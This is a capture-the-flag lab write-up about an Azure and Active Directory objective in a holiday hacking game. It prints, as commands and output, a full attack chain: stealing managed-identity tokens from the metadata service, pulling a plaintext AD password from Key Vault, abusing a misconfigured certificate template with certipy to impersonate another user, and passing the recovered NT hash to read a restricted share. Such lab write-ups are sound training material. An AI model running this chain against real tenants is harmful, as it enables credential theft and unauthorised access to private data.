Azure Active Directory⚓︎
Difficulty:
Direct link: Objective5.zip
⚓︎
Objective⚓︎
Request
Go to Steampunk Island and help Ribb Bonbowford audit the Azure AD environment. What's the name of the secret file in the inaccessible folder on the FileShare?
Ribb Bonbowford
Hello, I'm Ribb Bonbowford. Nice to meet you!
Oh golly! It looks like Alabaster deployed some vulnerable Azure Function App Code he got from ChatNPT.
Don't get me wrong, I'm all for testing new technologies. The problem is that Alabaster didn't review the generated code and used the Geese Islands Azure production environment for his testing.
I'm worried because our Active Directory server is hosted there and Wombley Cube's research department uses one of its fileshares to store their sensitive files.
I'd love for you to help with auditing our Azure and Active Directory configuration and ensure there's no way to access the research department's data.
Since you have access to Alabaster's SSH account that means you're already in the Azure environment. Knowing Alabaster, there might even be some useful tools in place already.
Hints⚓︎
Useful Tools
It looks like Alabaster's SSH account has a couple of tools installed which might prove useful.
Misconfiguration ADventures
Certificates are everywhere. Did you know Active Directory (AD) uses certificates as well? Apparently the service used to manage them can have misconfigurations too.
Solution⚓︎
First we'll need to ssh into alabaster's account to gather some information.
ssh alabaster@ssh-server-vm.santaworkshopgeeseislands.org -i hhc_key -i admin-key
There are several tools in the impacket directory, but initial recon is necessary to determine which tools may be useful.
Get Token to Access Azure Management⚓︎
curl -s -w '\n' -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2023-07-01&resource=https://management.azure.com/" | jq
export MCREDS=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDU1MjA1NTYsIm5iZiI6MTcwNTUyMDU1NiwiZXhwIjoxNzA1NjA3MjU2LCJhaW8iOiJFMlZnWUpENm9INHIzYkY4L1ovSHV6Wi8raEdYQXdBPSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwicmgiOiIwLkFGRUEybzZqa0FaQTFVMlNUR3lsWEt6QlRVWklmM2tBdXRkUHVrUGF3ZmoyTUJQUUFBQS4iLCJzdWIiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJ0aWQiOiI5MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQiLCJ1dGkiOiJsVkpqU2ZHMWFrU2pjMG9IeXp3SkFBIiwidmVyIjoiMS4wIiwieG1zX2F6X3JpZCI6Ii9zdWJzY3JpcHRpb25zLzJiMDk0MmYzLTliY2EtNDg0Yi1hNTA4LWFiZGFlMmRiNWU2NC9yZXNvdXJjZWdyb3Vwcy9ub3J0aHBvbGUtcmcxL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvc3NoLXNlcnZlci12bSIsInhtc19jYWUiOiIxIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5NYW5hZ2VkSWRlbnRpdHkvdXNlckFzc2lnbmVkSWRlbnRpdGllcy9ub3J0aHBvbGUtc3NoLXNlcnZlci1pZGVudGl0eSIsInhtc190Y2R0IjoxNjk4NDE3NTU3fQ.G0CWxjRz6mL1QYlyhx0xcB2waOzCoLQV0TPFzs7ED54ASE1EnlbakYi9qiTfBquTbW5FaWdaZPhbMkFfzHkpIq93inE8O1f8t6u6oJzvOlcDYbVHf-MMt0S8F2nHYS1LtgsBtKUzl6huMf96gbWS_4oEJEvqcQswxKErWyYI9ksEwiFLLyvTlxmXRsvq4eBQ5mf_hbjf1MfAFjVOz5iIVoUoTgKoSwmEwkP8UaeT3-y992HA8023SaCSnMDZ3DDcJWY5std3pfi3RLyR7Jx3zKRfr__9XKHMAjnnIdwYJvR5iBUmHcbfsu-jxAUhIwK-yMS886nwoGfiYria9ZFxeA
Gather Basic Info⚓︎
curl -s "https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resources?api-version=2023-07-01" -H "Authorization: Bearer $MCREDS" | jq
Result
{
"value": [
{
"id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-it-kv",
"name": "northpole-it-kv",
"type": "Microsoft.KeyVault/vaults",
"location": "eastus",
"tags": {}
},
{
"id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-ssh-certs-kv",
"name": "northpole-ssh-certs-kv",
"type": "Microsoft.KeyVault/vaults",
"location": "eastus",
"tags": {}
}
]
}
curl -s "https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-it-kv?api-version=2023-07-01" -H "Authorization: Bearer $MCREDS" | jq
Result
{
"id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-it-kv",
"name": "northpole-it-kv",
"type": "Microsoft.KeyVault/vaults",
"location": "eastus",
"tags": {},
"systemData": {
"createdBy": "thomas@sanshhc.onmicrosoft.com",
"createdByType": "User",
"createdAt": "2023-10-30T13:17:02.532Z",
"lastModifiedBy": "thomas@sanshhc.onmicrosoft.com",
"lastModifiedByType": "User",
"lastModifiedAt": "2023-10-30T13:17:02.532Z"
},
"properties": {
"sku": {
"family": "A",
"name": "Standard"
},
"tenantId": "90a38eda-4006-4dd5-924c-6ca55cacc14d",
"accessPolicies": [],
"enabledForDeployment": false,
"enabledForDiskEncryption": false,
"enabledForTemplateDeployment": false,
"enableSoftDelete": true,
"softDeleteRetentionInDays": 90,
"enableRbacAuthorization": true,
"vaultUri": "https://northpole-it-kv.vault.azure.net/",
"provisioningState": "Succeeded",
"publicNetworkAccess": "Enabled"
}
}
Get Token to Access Azure Vault⚓︎
curl -s -w '\n' -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2023-07-01&resource=https://vault.azure.net/" | jq
export VCREDS=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL3ZhdWx0LmF6dXJlLm5ldCIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDU1MjMxMTIsIm5iZiI6MTcwNTUyMzExMiwiZXhwIjoxNzA1NjA5ODEyLCJhaW8iOiJFMlZnWUhndFpNOXhTdjQ5US9ReUY1MGR1NStHQVFBPSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsIm9pZCI6IjYwMGEzYmM4LTdlMmMtNDRlNS04YTI3LTE4YzNlYjk2MzA2MCIsInJoIjoiMC5BRkVBMm82amtBWkExVTJTVEd5bFhLekJUVG16cU0taWdocEhvOGtQd0w1NlFKUFFBQUEuIiwic3ViIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwidGlkIjoiOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkIiwidXRpIjoiMS15N1pJX1ctay11a2dWMEpOME5BQSIsInZlciI6IjEuMCIsInhtc19hel9yaWQiOiIvc3Vic2NyaXB0aW9ucy8yYjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0LkNvbXB1dGUvdmlydHVhbE1hY2hpbmVzL3NzaC1zZXJ2ZXItdm0iLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy8yYjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0Lk1hbmFnZWRJZGVudGl0eS91c2VyQXNzaWduZWRJZGVudGl0aWVzL25vcnRocG9sZS1zc2gtc2VydmVyLWlkZW50aXR5In0.J1FmAZoNTuCHIR4CNdQQk703h7VTBFg71oWT2Lii1b1WqMp1vzUpa2UEs_8knJFseWLjBopuP838xkT46pb1Nb6pQdDHMxMLzJkda4ZkdlE_Dd5pkNHOS1IZfUhzNkjjjXAZYi2Yq-iMUALXRmdwSN1i77I2fEBBLwjpAGcJ5IK6ko7HIvcJ6cj3lqHaHM6rgnZeANY1ZSOsq4LVKyU8S0nQDTqHZtMMozMtXQYY90zuZYdJTJ6OLub1uw0jjUgBjO2hwT2jW4nSuzU2p_UTzpN2Nl5WoE-ic6DU2IFORsa2l7zxGbdQg1FcQOEvY-uv3cVam3IgNM4ERvrZvCKsSw
Key Vault Info⚓︎
curl -s "https://northpole-it-kv.vault.azure.net/secrets?api-version=7.4" -H "Authorization: Bearer $VCREDS" | jq
Results
{
"value": [
{
"id": "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript",
"attributes": {
"enabled": true,
"created": 1699564823,
"updated": 1699564823,
"recoveryLevel": "Recoverable+Purgeable",
"recoverableDays": 90
},
"tags": {}
}
],
"nextLink": null
}
curl -s "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript/versions?api-version=7.4" -H "Authorization: Bearer $VCREDS" | jq
Results
{
"value": [
{
"id": "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript/d8a14e5339d04b44a20392210c0283fe",
"attributes": {
"enabled": true,
"created": 1698673721,
"updated": 1698673721,
"recoveryLevel": "Recoverable+Purgeable",
"recoverableDays": 90
},
"tags": {}
},
{
"id": "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript/ec4db66008024699b19df44f5272248d",
"attributes": {
"enabled": true,
"created": 1699564823,
"updated": 1699564823,
"recoveryLevel": "Recoverable+Purgeable",
"recoverableDays": 90
},
"tags": {}
}
],
"nextLink": null
}
curl -s "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript/d8a14e5339d04b44a20392210c0283fe?api-version=7.4" -H "Authorization: Bearer $VLTCREDS" | jq
Result
{
"value": "# Import the Active Directory module Import-Module ActiveDirectory # Define user properties $UserName = \"elfy\" $UserDomain = \"northpole.local\" $UserUPN = \"$UserName@$UserDomain\" $Password = ConvertTo-SecureString \"J4`ufC49/J4766\" -AsPlainText -Force $DCIP = \"10.0.0.53\" # Create a new AD user New-ADUser -UserPrincipalName $UserUPN -Name $UserName -GivenName $UserName -Surname \"\" -Enabled $true -AccountPassword $Password -Server $DCIP -PassThru",
"id": "https://northpole-it-kv.vault.azure.net/secrets/tmpAddUserScript/d8a14e5339d04b44a20392210c0283fe",
"attributes": {
"enabled": true,
"created": 1698673721,
"updated": 1698673721,
"recoveryLevel": "Recoverable+Purgeable",
"recoverableDays": 90
},
"tags": {}
}
Try Out Login Credentials⚓︎
smbclient.py northpole.local/elfy:J4\`ufC49\/J4766@10.0.0.53
help
open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
lls {dirname} - lists all the files on the local filesystem.
tree {filepath} - recursively lists all files in folder and sub folders
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put {filename} - uploads the filename into the current path
get {filename} - downloads the filename from the current path
mget {mask} - downloads all files from the current directory matching the provided mask
cat {filename} - reads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
shares
Results
ADMIN$
C$
D$
FileShare
IPC$
NETLOGON
SYSVOL
use FileShare
ls
Result
drw-rw-rw- 0 Thu Dec 28 01:13:43 2023 .
drw-rw-rw- 0 Thu Dec 28 01:13:40 2023 ..
-rw-rw-rw- 701028 Thu Dec 28 01:13:42 2023 Cookies.pdf
-rw-rw-rw- 1521650 Thu Dec 28 01:13:42 2023 Cookies_Recipe.pdf
-rw-rw-rw- 54096 Thu Dec 28 01:13:43 2023 SignatureCookies.pdf
drw-rw-rw- 0 Thu Dec 28 01:13:43 2023 super_secret_research
-rw-rw-rw- 165 Thu Dec 28 01:13:43 2023 todo.txt
cat todo.txt
Result
1. Bake some cookies.
2. Restrict access to C:\FileShare\super_secret_research to only researchers so everyone cant see the folder or read its contents
3. Profit`
Find User with Permissions⚓︎
GetADUsers.py -dc-ip 10.0.0.53 -all northpole.local/elfy:'J4`ufC49/J4766'
Result
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying 10.0.0.53 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
alabaster 2023-12-27 01:02:34.735574 2023-12-27 01:16:31.973028
Guest <never> <never>
krbtgt 2023-12-27 01:09:46.718904 <never>
elfy 2023-12-27 01:12:15.749877 <never>
wombleycube 2023-12-27 01:12:15.843630 2023-12-27 20:33:34.997821
Find a Way to Get Access Through wombleycube⚓︎
certipy find -dc-ip 10.0.0.53 -u elfy -p 'J4`ufC49/J4766' -vulnerable
Result
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'northpole-npdc01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'northpole-npdc01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'northpole-npdc01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'northpole-npdc01-CA'
[*] Saved BloodHound data to '20240117203912_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20231227203912_Certipy.txt'
[*] Saved JSON output to '20231227203912_Certipy.json'
cat 20231227203912_Certipy.txt
certipy req -dc-ip 10.0.0.53 -u elfy -p 'J4`ufC49/J4766' -ca 'northpole-npdc01-CA' -template 'NorthPoleUsers' -upn 'wombleycube@northpole.local'
Result
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'wombleycube@northpole.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'wombleycube.pfx'
certipy auth -pfx 'wombleycube.pfx' -username 'wombleycube' -domain 'northpole.local' -dc-ip 10.0.0.53
Result
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: wombleycube@northpole.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'wombleycube.ccache'
[*] Trying to retrieve NT hash for 'wombleycube'
[*] Got hash for 'wombleycube@northpole.local': aad3b435b51404eeaad3b435b51404ee:5740373231597863662f6d50484d3e23
smbclient.py -hashes 'aad3b435b51404eeaad3b435b51404ee:5740373231597863662f6d50484d3e23' 'northpole.local/wombleycube@10.0.0.53'
shares
Result
ADMIN$
C$
D$
FileShare
IPC$
NETLOGON
SYSVOL
use FileShare
ls
Result
drw-rw-rw- 0 Wed Jan 17 01:13:11 2024 .
drw-rw-rw- 0 Wed Jan 17 01:13:08 2024 ..
-rw-rw-rw- 701028 Wed Jan 17 01:13:11 2024 Cookies.pdf
-rw-rw-rw- 1521650 Wed Jan 17 01:13:11 2024 Cookies_Recipe.pdf
-rw-rw-rw- 54096 Wed Jan 17 01:13:11 2024 SignatureCookies.pdf
drw-rw-rw- 0 Wed Jan 17 01:13:10 2024 super_secret_research
-rw-rw-rw- 165 Wed Jan 17 01:13:11 2024 todo.txt
cd super_secret_research
ls
Result
drw-rw-rw- 0 Wed Jan 17 01:13:11 2024 .
drw-rw-rw- 0 Wed Jan 17 01:13:11 2024 ..
-rw-rw-rw- 231 Wed Jan 17 01:13:11 2024 InstructionsForEnteringSatelliteGroundStation.txt
cat InstructionsForEnteringSatelliteGroundStation.txt
InstructionsForEnteringSatelliteGroundStation.txt
Note to self:
To enter the Satellite Ground Station (SGS), say the following into the speaker:
And he whispered, 'Now I shall be out of sight;
So through the valley and over the height.'
And he'll silently take his way.
Objective Answer
InstructionsForEnteringSatelliteGroundStation.txt
Response⚓︎
Ribb Bonbowford
Wow, nice work. I'm impressed!
This is all starting to feel like more than just a coincidence though. Everything Alabaster's been setting up lately with the help of ChatNPT contains all these vulnerabilities. It almost feels deliberate, if you ask me.
Now obviously an LLM AI like ChatNPT cannot have deliberate motivations itself. It's just a machine. But I wonder who could have built it and who is controlling it?
On top of that, we apparently have a satellite ground station on Geese Islands. I wonder where that thing would even be located.
Well, I guess it's probably somewhere on Space Island, but I've not been there yet.
I'm not a big fan of jungles, you see. I have this tendency to get lost in them.
Anyway, if you feel like investigating, that'd be where I'd go look.
Good luck and I'd try and steer clear of ChatNPT if I were you.